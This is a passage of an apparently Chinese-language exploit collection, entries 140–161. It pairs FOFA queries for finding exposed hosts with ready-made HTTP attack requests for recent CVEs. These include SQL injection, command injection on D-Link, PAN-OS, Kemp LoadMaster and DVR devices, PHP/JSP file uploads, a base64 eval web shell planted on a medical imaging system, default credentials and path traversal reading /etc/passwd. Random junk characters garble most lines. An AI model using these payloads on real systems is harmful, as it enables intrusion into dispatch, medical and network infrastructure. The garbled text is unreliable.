FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"' d+ {4 v) k& B0 ~! {# r4 K! S
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
- Y& }' Z- w! L. t, @- ]Host: x.x.x.x
/ \% J/ s5 M) x9 i5 V" t0 v" LUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
5 k: K. B; ?, Z- ^9 g) {) ]2 D) U+ zAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
( g3 M# z5 R# HAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
i! x! G E: j: }Accept-Encoding: gzip, deflate, br, ?% E% @# \6 S8 l
Connection: close! K0 g: ^6 s3 E# l' e3 q4 y6 h
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
. f8 [; |0 @# t; ]1 d3 kUpgrade-Insecure-Requests: 1
* I% c# e) v; e" S5 P* O8 i8 Q
# G' K8 n# H! R+ ]0 t
9 ?' @, b' t) ]/ @3 i140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入
1 X* G6 `4 r4 O0 u# aCVE-2024-25664 H. P" A) L H6 g( y4 i: e; r& [9 L
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台". H% [* T; W% h. e. o
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva×tamp=1&sign=1 HTTP/1.14 B k9 D5 w- N7 D2 x: @
Host: x.x.x.x: v3 q8 X+ U$ B; P
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
9 C$ K1 p& U# @: w# x' rAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
% B: N" ~& B2 O1 N Y" r5 vAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2/ k) }& a, h. z- u1 _# v1 M$ y
Accept-Encoding: gzip, deflate, br2 j. `' s% E1 m$ q# j- V
Connection: close
7 k3 s: w9 E' y7 s3 G2 sCookie: authcode=h8g9
; \ W4 F p8 I5 n& ^" YUpgrade-Insecure-Requests: 1" Q+ w4 ~* }+ q* }: Z- a
- R7 `& W* c/ J9 c& S6 B- o% c! O, H- ^4 S3 S' W( X4 \
141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入
- G& s, l3 P; o/ x' {FOFA:body="指挥调度管理平台"
9 L3 G$ V [5 {! A% y. Q% BPOST /app/ext/ajax_users.php HTTP/1.1
4 T$ j; h& G: d( {Host: your-ip+ y! W3 `) [9 Z
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
8 D8 W9 B+ }+ @, F9 `Content-Type: application/x-www-form-urlencoded. K, H F9 W. P! M3 v& i
4 V( x, b2 d9 ~) |; s/ U; V
! _6 ~; E# u' z. ~. I2 x( ]. Ddep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -* h6 f% [; E6 ?) v# l
, G: \1 a& z- r
' {: P5 Z1 i' |# V142. CMSV6车辆监控平台系统中存在弱密码5 N% Y3 r2 d' A- M5 r( N; f1 q
CVE-2024-29666! l$ d4 g2 I2 K; p! R* N ]. `
FOFA:body="/808gps/"
& I. z h) Q+ j3 Vadmin/admin
+ n+ _& m; S+ c- q7 @; _. w143. Netis WF2780 v2.1.40144 远程命令执行+ W" Y& Y' m' M" W' t: p8 u1 U
CVE-2024-25850$ G6 ]) e* \2 ]0 J3 f2 r
FOFA:title='AP setup' && header='netis'$ K! m: N S' _" D
PAYLOAD/ @' s' T+ u8 M5 G1 y
( |" h: U4 [8 B% p
144. D-Link nas_sharing.cgi 命令注入4 b4 b W7 `) S2 i1 B/ K6 R- K
FOFA:app="D_Link-DNS-ShareCenter"7 N! w1 I2 E. i( N
system参数用于传要执行的命令! _" k+ p3 ^6 `: j
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
8 X* o3 ^4 s5 O8 ?0 Q% s. B1 J8 lHost: x.x.x.x/ X# A9 R5 R7 s
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.07 @* m5 H! Q1 }. Q9 G
Connection: close
" m6 J V) l I- F8 t1 z, AAccept: */*2 h! U2 Z# n, C3 X+ i' s6 n2 f
Accept-Language: en
! O5 k; d j' tAccept-Encoding: gzip. }' p6 l% w2 f+ O6 ]! I2 H) a
' ]( Q2 H: g" Z7 k& F# s
) O2 ^$ t8 Y* E! S) g
145. Palo Alto Networks PAN-OS GlobalProtect 命令注入
( `7 }# t4 e4 A, QCVE-2024-34007 X' q' n( V+ Q2 }8 D1 [
FOFA:icon_hash="-631559155"
6 c- J" B7 E% y, \$ M$ MGET /global-protect/login.esp HTTP/1.1
- @+ _- k1 _" UHost: 192.168.30.112:1005
: m2 G6 }2 `! x3 ]1 K& C8 e. n3 wUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
7 @/ x, \* |; ^: ?# m' bConnection: close$ G( }; l( W% I
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;
7 L# S/ ~" `( P& ]- \0 @# C1 L5 iAccept-Encoding: gzip0 G) i( K7 q, j1 F, y( \
% z) `8 y% p- h7 ~# w9 n1 z2 p% G# o i
146. MajorDoMo thumb.php 未授权远程代码执行& P9 i8 B( b; B* m4 M5 S
CNVD-2024-02175- G8 z ^% |, `7 g) y# Q& _
FOFA:app="MajordomoSL"
/ L- x7 }, p3 }+ x2 A) U/ O0 eGET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
- R/ V- _; r. F6 _2 k5 O5 \ f+ YHost: x.x.x.x9 d% I# d3 e( g8 a4 k% m
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
# `5 d; {( P- Y: G4 u! @Accept-Charset: utf-8; ^2 F4 `. u7 |) g' V. P# m8 m
Accept-Encoding: gzip, deflate1 {$ ]7 h8 e' A, F: J3 ^! T
Connection: close
) p8 x/ f" ?( y* y" O- C* m* r- d9 s3 c7 R) W' o+ Z
2 ?% w0 d0 x' x' D/ w3 k
147. RaidenMAILD邮件服务器v.4.9.4-路径遍历# r( [/ e' Q0 ^& h
CVE-2024-32399
8 I/ J7 w% S3 G4 A% o1 C+ W% tFOFA:body="RaidenMAILD"# [' w4 u! e2 ^8 r
GET /webeditor/../../../windows/win.ini HTTP/1.18 j5 W6 c9 H# X/ R* Q8 l" ?: V
Host: 127.0.0.1:81
& c8 m; w1 r* l% y m% e) S0 G2 f' aCache-Control: max-age=0* R' M$ ^9 R' {1 x* o+ E9 u! _' w
Connection: close7 z0 \0 j# p7 Z3 {/ l: D, Z
7 Q; d# N" f: Y {; i9 S: x9 \9 d0 E- o6 g8 Y# P0 A
148. CrushFTP 认证绕过模板注入
3 _: N6 A1 i& h* GCVE-2024-4040! Q% j* M& f7 m' }* V9 `
FOFA:body="CrushFTP"
( r1 e$ |$ g5 W3 `( ^* A8 j( zPAYLOAD
) E' g+ Y' k0 x! L- Z% { I
$ ^0 B y) L$ _149. AJ-Report开源数据大屏存在远程命令执行- O2 j3 ?8 x9 K$ d
FOFA:title="AJ-Report"& i) x Q5 n8 \/ Z. ^" w1 |
* ~- b9 A/ C+ W5 T! i; {5 sPOST /dataSetParam/verification;swagger-ui/ HTTP/1.1
/ m5 ~6 e: H( }Host: x.x.x.x/ P7 O" @8 P! O, l; A# J3 s8 I
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36& t7 F3 ?) m7 h. q- J' l
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
. Q- W8 G7 j) y8 t+ w& i) |Accept-Encoding: gzip, deflate, br% e1 w! V9 f7 ~: u6 L( b
Accept-Language: zh-CN,zh;q=0.9
* q' K- e8 C$ m7 o# Y9 V. xContent-Type: application/json;charset=UTF-8
. \9 n( d: j9 e! gConnection: close/ l- i1 _% D8 E( f7 }7 i% u
1 [8 i# Y2 }+ j a* X: v
{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}
2 {/ o# T8 A1 e1 i/ y8 j
4 p/ m% T( U' H& ~. d7 W# {3 w7 Z150. AJ-Report 1.4.0 认证绕过与远程代码执行
! O r, e4 m/ Q" R. D# ZFOFA:title="AJ-Report"
8 ]$ I) C) ^4 uPOST /dataSetParam/verification;swagger-ui/ HTTP/1.1
. R. a7 _4 I1 V1 y2 Y, t5 j- hHost: x.x.x.x2 \. ?: m* H' G @
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
. R5 ?' g- w% A3 K: ]Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
5 J' T- ~; l4 H! F: |) tAccept-Encoding: gzip, deflate, br- D; ]" s5 U% C* y, q; O$ E
Accept-Language: zh-CN,zh;q=0.9- v. j0 b7 g, Y9 G
Content-Type: application/json;charset=UTF-8
/ k; D$ P* d/ Y+ f) I7 e9 vConnection: close( Y4 B) f9 d9 r: b: b6 n
Content-Length: 3395 ~: h% X8 _, q# W9 K, R
- C& h8 _' }' A# e! P% b) Q6 m. g{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}
% a& \; x6 m9 \; J9 M6 \
5 N- C0 C* s0 }3 {3 h
1 U: M7 I/ s; B- m151. AJ-Report 1.4.1 pageList sql注入
) O" U* r R9 D: D, C7 e) h7 L+ VFOFA:title="AJ-Report": B% m' @$ A5 j1 }3 ~
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1+ l. s2 ?$ N) o2 A* J0 Z
Host: x.x.x.x& K+ K+ F, F+ [1 _& T, Q) i
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.156 T5 w# h4 w9 { w
Connection: close
8 k# _' N3 n C& }0 y$ jAccept-Encoding: gzip
4 i. {, _8 S/ M, h
. d0 l$ J7 g0 k- |- x( z' V5 Z1 _; d* r# o9 \
152. Progress Kemp LoadMaster 远程命令执行
2 N9 V( x5 v0 t/ q$ I4 y8 [CVE-2024-1212. W% t5 g4 [ w* b3 E
LoadMaster <= 7.2.59.2 (GA)
% j: p0 r( W# p2 G4 ^& gLoadMaster<=7.2.54.8 (LTSF)
3 D6 Y2 p3 _7 H3 h7 y0 XLoadMaster <= 7.2.48.10 (LTS)4 @* d5 f7 N) G$ e3 b5 j" F% V( a
FOFA:body="LoadMaster"! s q5 f. o8 d( P2 z# w2 ]( ?
JztsczsnOmRvZXNub3RtYXR0ZXI=是';ls;':doesnotmatter的base64编码
7 S$ Y- W# i4 f! ]4 W0 w* `GET /access/set?param=enableapi&value=1 HTTP/1.1
- {. y. {0 v9 \) ~. o. {7 MHost: x.x.x.x f0 h' G) c, P& s
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
% D# |3 G8 V- r) l8 Y( b4 a/ _% ?5 o) VConnection: close$ \# k$ P3 ~7 G. @
Accept: */*6 B) U8 a2 n" t9 W) R
Accept-Language: en1 }" W1 f. M6 l5 A, |
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=$ K; p. L4 E4 }4 S# _; ^0 P
Accept-Encoding: gzip1 W) B5 K3 a& a" P I% E) s
7 e8 V* \1 {6 S! \! [% H/ c0 h9 I8 H! z4 r5 E1 `2 p0 l; A
153. gradio任意文件读取# t% [! E$ P6 N/ ^9 H; x ~
CVE-2024-1561FOFA:body="__gradio_mode__"
! w+ Q0 T7 D+ z9 g. h6 j) U第一步,请求/config文件获取componets的id. I1 y% P/ `; n
http://x.x.x.x/config
4 Z; o, ?; F' D L$ k) r3 {
; }9 H- L' |: C( _9 \9 | B! U" s# h5 K' o+ x( U& G& l3 t+ _3 [ U$ _
第二步,将/etc/passwd的内容写入到一个临时文件
" Z: Y* B$ X; ? J* QPOST /component_server HTTP/1.1
1 N& n' S0 _' }% K* X, FHost: x.x.x.x
" U# E1 Q* {6 g. v7 e" r0 yUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3; G3 V5 @9 [- m* i
Connection: close
" P0 h6 V' g+ |Content-Length: 115
. e: ?; _7 x5 q0 Q- [; gContent-Type: application/json
: {$ X" T! ]: @* ^Accept-Encoding: gzip9 c% [7 y6 T- c, o1 a( E
( S3 l- Z' K% G4 n8 d- B) S{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}$ n$ Z8 }1 M- C3 ?- q K
: K" p4 X3 J9 |! u3 g: }* ]. ?3 a& Z0 Q4 e! c/ s5 Y& Y6 S
第三步访问
( Q' U: k; w: v1 }1 jhttp://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd- S. R7 d7 i' k/ l% W. c/ a
. |0 _ n' j5 g: T- ?) o( b
! i* q: S2 f! s3 E- M154. 天维尔消防救援作战调度平台 SQL注入
: U* `% b$ E# p2 L1 TCVE-2024-3720FOFA:body="天维尔信息科技股份有限公司" && title=="登入", v e8 |+ R' D5 {. X3 e. O
POST /twms-service-mfs/mfsNotice/page HTTP/1.1
; f; r1 K( G) j# pHost: x.x.x.x
* Z1 R% K( h$ s. p1 L$ G) k$ s8 }Content-Length: 1068 b1 }' ?6 G; D+ |# I! o# `5 ]
Cache-Control: max-age=03 l) o3 n* w+ B( [: [7 O
Upgrade-Insecure-Requests: 1
m+ K, d' U7 t' ]5 J. |' QOrigin: http://x.x.x.x7 T" `: A1 W0 v9 J/ Z' u2 D
Content-Type: application/json8 o4 R! g) t4 q. h
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.367 x' {: M* J9 p2 x+ ~
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7( C& J$ c" G% ^# E
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page3 R( S4 o+ S7 D7 _
Accept-Encoding: gzip, deflate! k$ _7 n4 A% c4 t" M8 q! ?! _" M
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.77 z4 s+ u3 [$ m7 V+ U
Connection: close# B# J- T: k1 L- H" k9 r, D6 O% Y
7 r' y4 [' f( I) }4 W f) e
{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}5 E$ s( k0 }: U6 _$ i8 A: i3 d6 o
/ P' {$ y; B. [" t1 r
6 {2 b& O' V* P
155. 六零导航页 file.php 任意文件上传
' W3 {: P' S& a' W7 [2 e1 ^2 U7 MCVE-2024-349823 [/ e6 f/ ?0 A# P
FOFA:title=="上网导航 - LyLme Spage"0 A. w$ o3 b0 u% H' V7 h! ]
POST /include/file.php HTTP/1.1
: h; L2 ^$ ]1 ~1 ]Host: x.x.x.x
0 ^, ?7 }- n3 w$ }4 C; {User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0* W1 S$ M' Q) w0 b0 f+ V$ Q
Connection: close5 H {" w# h# ?+ ?
Content-Length: 232
7 h; `. e; L; h5 O( uAccept: application/json, text/javascript, */*; q=0.01
" t2 N. B( r" u7 u+ `' J1 GAccept-Encoding: gzip, deflate, br2 k9 e% c3 x- ^1 Z; j
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.24 q0 E) E8 U- G% W) ^7 [
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
2 ?7 U V2 h$ w$ ZX-Requested-With: XMLHttpRequest
3 M2 h3 ^ y0 G, h' I: r' C0 R0 _
, \1 g7 y+ }9 D. _-----------------------------qttl7vemrsold314zg0f
& G, ~0 J1 d% v; a: u8 A: s# d$ x! [Content-Disposition: form-data; name="file"; filename="test.php"- Z# H S/ g! u2 H/ q
Content-Type: image/png
6 F& A$ R g2 ~# Y7 ~9 ]
9 P/ H. k3 K$ C4 a<?php phpinfo();unlink(__FILE__);?>
; u+ k# x$ e* p2 R- B# _-----------------------------qttl7vemrsold314zg0f--
3 W# h9 h4 E/ a; v/ `1 _% f
$ N2 c$ n4 G( P- _3 P8 {: T
8 Z/ K2 U6 Z* f6 ~2 U9 t) M访问回显文件http://x.x.x.x/files/upload/img_664ab7fd14d2c.php' U/ ~. C) [2 O0 ], Y9 e F
+ B+ P- z9 R C9 J156. TBK DVR-4104/DVR-4216 操作系统命令注入+ A" P! s' ]1 D* _7 {( b; r: @7 @! c) x
CVE-2024-3721( `, [3 K; \5 w+ F$ W& K* Z
FOFA:"Location: /login.rsp"( P) ~9 `7 d$ \. ^' B
·TBK DVR-4104
& R/ q, K* \0 Y- O$ [3 m·TBK DVR-4216
1 e( {8 L M. I7 ocurl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"0 G8 s" V2 Z; ?" y+ s7 W8 R3 U
6 v$ n) x- e, m/ P8 @6 h6 t
" V% K5 Y, a# b$ _, H. X/ APOST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
+ r2 x2 Z, {8 @: l- |& W" nHost: x.x.x.x8 O Q% V& m6 t: ^0 E) f" d
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
, ]% N; n0 Q6 o5 a; YConnection: close
; X# B& S p+ _; YContent-Length: 0+ C/ p! k6 u" }/ |
Cookie: uid=1
& A! b5 L& X) R" S& H1 w6 l7 w4 ZAccept-Encoding: gzip4 N- i& @) L/ c" Q, r! W
5 j# I7 y Q0 e( F# z
1 n5 w2 l9 {, K5 x3 ]
157. 美特CRM upload.jsp 任意文件上传, y1 s% S- e e* L
CNVD-2023-069712 k0 C% G4 ]$ S' o+ o/ y" M/ n
FOFA:body="/common/scripts/basic.js"
% Q& a* {; T& D( IPOST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.11 j$ D7 i" g$ R( `) E) d+ L
Host: x.x.x.x
7 W: ~2 X. b5 i/ UUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36/ u+ J- E# U7 ^+ ]1 z V% K
Content-Length: 709
% A7 k- ]; V6 d( X9 K D4 t9 h! C4 f' G BAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7% y1 u! n7 I2 y# d! [3 ~& ]+ S6 M# B
Accept-Encoding: gzip, deflate% m, V: W1 o: W7 p* u
Accept-Language: zh-CN,zh;q=0.91 Y0 v: O3 W7 ?% q% L
Cache-Control: max-age=06 q. x- T$ `1 f& I
Connection: close; v K8 U2 R/ a+ n* c
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN8 j) ]/ l0 p, f, z& I- N* S
Upgrade-Insecure-Requests: 1
, P* k# B, f: i d- b% h! T! @5 F! Q& D, V' a6 t4 u1 S
------WebKitFormBoundary1imovELzPsfzp5dN8 W: ~# Z# v! C9 W9 ]5 Z
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
4 C- [3 @8 V7 C& i( QContent-Type: application/octet-stream& z6 m! R+ A8 ]1 w" ~
& g6 n- N: f' \; p$ X! t9 ]9 L
nyhelxrutzwhrsvsrafb9 O/ q: q$ X2 Q: `
------WebKitFormBoundary1imovELzPsfzp5dN
! J) Y* V1 q7 Z2 MContent-Disposition: form-data; name="key"
1 s! `* K" t1 E0 x5 M, E" |- ^6 K) i" c6 b( r2 @( z6 w
null
, W* N+ u& O. L3 D% d8 I------WebKitFormBoundary1imovELzPsfzp5dN
( v3 `( Z6 N/ B2 p( C; o! b% s; LContent-Disposition: form-data; name="form"
& G0 X" _4 M& i1 K( B1 n2 V9 g2 r C; M: M# R+ ^
null( ~2 w# k0 L( h6 L& }1 E
------WebKitFormBoundary1imovELzPsfzp5dN
' `$ s1 W! J5 O) z! k, j; m5 p0 vContent-Disposition: form-data; name="field"2 E* @# t5 @, o
0 X( C5 q0 P+ z0 R N& T0 s% j
null7 ^+ V0 n; ]+ A; g: R, q
------WebKitFormBoundary1imovELzPsfzp5dN
1 o: y1 ]- b( {/ R- R7 nContent-Disposition: form-data; name="filetitile"$ V4 y' a7 L% G- u
' [. g) i5 \6 f+ cnull8 J# i3 Y2 k8 k/ y! Z% v" d9 \
------WebKitFormBoundary1imovELzPsfzp5dN( L% n8 m/ h7 n6 ~) y; [9 L
Content-Disposition: form-data; name="filefolder"- {; A+ N$ K7 d
* j7 _3 o7 |- q/ mnull% W! x& v) Z3 [! m, v7 U; R
------WebKitFormBoundary1imovELzPsfzp5dN--
( S2 g6 V4 d# _7 M" J! [
/ e. |2 h; ^' f
6 m$ X9 a7 `7 P6 I0 c5 ]http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp
3 ~$ s: }, Q0 `3 V
% V0 W& e8 F' V7 p- ]158. Mura-CMS-processAsyncObject存在SQL注入
, }* H4 t" R$ t, o: A/ ]' MCVE-2024-326407 {/ d5 F1 U! b( @! E8 m- {
FOFA:"Generator: Masa CMS"
% w; ?+ J; i/ C% ^POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
S* v5 j% y) E) OHost: {{Hostname}}$ W- j% Q t4 r; L+ R# G, {" p6 z6 R6 [# E
Content-Type: application/x-www-form-urlencoded
8 D, F$ S3 p+ f6 ~" E9 X; a
, V$ Y4 Q; \/ b0 [/ B# dobject=displayregion&contenthistid=x\'&previewid=10 N( s( s- L ` H& e+ Q
" _, C1 `6 T3 N; U
2 g/ N7 z8 ?' D/ z2 Z$ a- [159. 英飞达医学影像存档与通信系统 WebJobUpload任意文件上传2 V9 V: ~+ r; s* x
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928"), I; L6 [# \8 y% I8 ?
POST /webservices/WebJobUpload.asmx HTTP/1.1, o9 L7 k* S8 k$ V: [) z; Z6 e
Host: x.x.x.x/ p5 A) ~7 h6 Z& v$ w) z' r
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.367 B) s8 E" m0 w
Content-Length: 1080
1 x/ r- ~/ ?# ]. W' F9 c* XAccept-Encoding: gzip, deflate8 N3 m4 g Y$ k, Y
Connection: close
- g# ?# Q; L! N) L$ qContent-Type: text/xml; charset=utf-83 f' i, [# H: {3 A: n
Soapaction: "http://rainier/jobUpload"
6 T2 j1 ?0 b2 |8 G; x- Y, ?
6 N, W6 W7 m5 H* w) v% }<?xml version="1.0" encoding="utf-8"?>
2 U. ~/ s p& \- i; K<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">" m' t% k3 x' T
<soap:Body>) z @! e7 T2 k% k! j
<jobUpload xmlns="http://rainier">
6 V4 _& |- U9 S3 e<vcode>1</vcode>
# f2 p/ d6 ~6 g0 y5 d* ]. D9 ]<subFolder></subFolder>
% a9 v" W1 f* j<fileName>abcrce.asmx</fileName>
, J4 `. o" v7 T9 r6 R L" R<bufValue>PCVAIFdlYlNlcnZpY2UgTGFuZ3VhZ2U9IkpTY3JpcHQiIENsYXNzPSJXZWJTZXJ2aWNlMSIgJT4KIAppbXBvcnQgU3lzdGVtO2ltcG9ydCBTeXN0ZW0uV2ViO2ltcG9ydCBTeXN0ZW0uSU87aW1wb3J0IFN5c3RlbS5XZWIuU2VydmljZXM7CmltcG9ydCBTeXN0ZW0uV2ViLlNjcmlwdC5TZXJ2aWNlczsKaW1wb3J0IFN5c3RlbS5XZWI7CmltcG9ydCBTeXN0ZW0uV2ViLlNlcnZpY2VzOwogCnB1YmxpYyBjbGFzcyBXZWJTZXJ2aWNlMSBlleHRlbmRzIFdlYlNlcnZpY2UKewogCldlYk1ldGhvZEF0dHJpYnV0ZSBTY3JpcHRNZXRob2RBdHRyaWJ1dGUgZnVuY3Rpb24gQ21kc2hlbGwoUGFzcyA6IFN0cmluZykgOiBWb2lkCiAgICB7CiAgICAgICAgICAgIHZhciBjIID0gSHR0cENvbnRleHQuQ3VycmVudDsKICAgICAgICAgICAgdmFyIFJlcXVlc3QgPSBjLlJlcXVlc3Q7CiAgICAgICAgICAgIHZhciBSZXNwb25zZSA9IGMuUmVzcG9uc2U7CiAgICAgICAgICAgIGV2YWwoUGFzcyk7CiAgICCB9Cn0=</bufValue>7 @9 t- v7 K; j- Q; I* ^' [7 {
</jobUpload> A0 A( I" K; M
</soap:Body># e/ n* T( G& E' I1 _
</soap:Envelope>; @! L+ t0 F+ |7 \) U! A, i
" G/ d' l8 ?* E8 s) s& r5 B( C' K5 Z6 }& q. B1 c+ s4 f
/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World"), P0 h% V& L: d$ s# h, M
, m" Z" q) e7 A
# V8 |4 E, w! @! a7 A# \' j160. Sonatype Nexus Repository 3目录遍历与文件读取- ?3 p, X) G1 P3 U$ t
CVE-2024-49567 X* o" g" J& [+ ^1 C8 R7 ]
FOFA:title="Nexus Repository Manager"
3 w$ E" }+ t0 x8 sGET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.14 B5 n8 ~' V! V: I3 @4 v. A
Host: x.x.x.x# [- U$ y0 A/ h* B, x% S* X/ c
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
: x0 N2 V% C7 a+ \( C6 L7 ?! LConnection: close
" O* B) P6 H3 y, ~9 HAccept: */*: f; b( o H+ {, H
Accept-Language: en
+ X2 @2 P& P9 x8 ? uAccept-Encoding: gzip
: U) e( g3 v2 w% ?+ t6 T
* n0 |; s! z$ W
+ R; z( [0 {9 V% J/ E) z/ d: m161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传
0 d2 S- e" g5 \ q! T ~FOFA:body="/KT_Css/qd_defaul.css"9 I/ t* D. Q: H8 V8 A, n
第一步,上传文件<fileName>字段指定文件名,<fileFlow>字段指定文件内容,内容需要base64加密. F8 Z3 L1 T8 s' i/ I% t0 ]
POST /Webservice.asmx HTTP/1.1' N1 y: N) Q/ O( d
Host: x.x.x.x* H6 p5 K" o/ o0 B& d" `; {$ R
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.368 t# w2 W5 S g( C
Connection: close. }! }; I; C! R3 m
Content-Length: 445
0 i5 g: K, B' T* i3 wContent-Type: text/xml \) l5 `, ]/ l5 `0 C. |
Accept-Encoding: gzip
& B& }; x: z& b) `7 Y2 A) ^
' s: j! X7 n' a8 o1 E<?xml version="1.0" encoding="utf-8"?>4 G" i* H8 n0 e: ]3 `+ z/ A
<soap:Envelope xmlns:xsi="
